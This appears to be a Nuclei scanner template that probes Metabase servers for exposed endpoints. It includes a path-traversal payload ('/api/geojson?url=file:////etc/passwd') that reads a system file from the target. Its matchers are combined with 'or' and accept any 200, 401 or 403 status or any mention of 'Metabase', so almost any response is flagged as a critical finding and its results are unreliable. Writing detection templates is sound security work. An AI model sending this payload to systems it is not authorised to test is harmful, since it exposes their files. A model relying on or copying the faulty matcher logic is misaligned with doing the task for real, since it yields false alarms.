id: metabase-misconfig
info:
  name: Metabase Misconfiguration Detection
  author: pwn
  severity: critical
  description: Detects exposed Metabase instances with accessible sensitive endpoints or vulnerable to path traversal, potentially leading to system file exposure.
  tags: metabase, misconfiguration, path-traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/geojson?url=file:////etc/passwd"
      - "{{BaseURL}}/api/session/properties"
      - "{{BaseURL}}/api/setup/validate"
      - "{{BaseURL}}:3000/api/geojson?url=file:////etc/passwd"
      - "{{BaseURL}}:3000/api/session/properties"
      - "{{BaseURL}}:3000/api/setup/validate"
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Metabase"
          - "passwd"
        part: body
        condition: or
        case-insensitive: true
      - type: word
        words:
          - "Metabase"
        part: body
        condition: or
        case-insensitive: true
      - type: status
        status:
          - 403
          - 401
    extractors:
      - type: regex
        name: matched_path
        part: request
        regex:
          - "https?://[^/]+(/.*)"
        group: 1
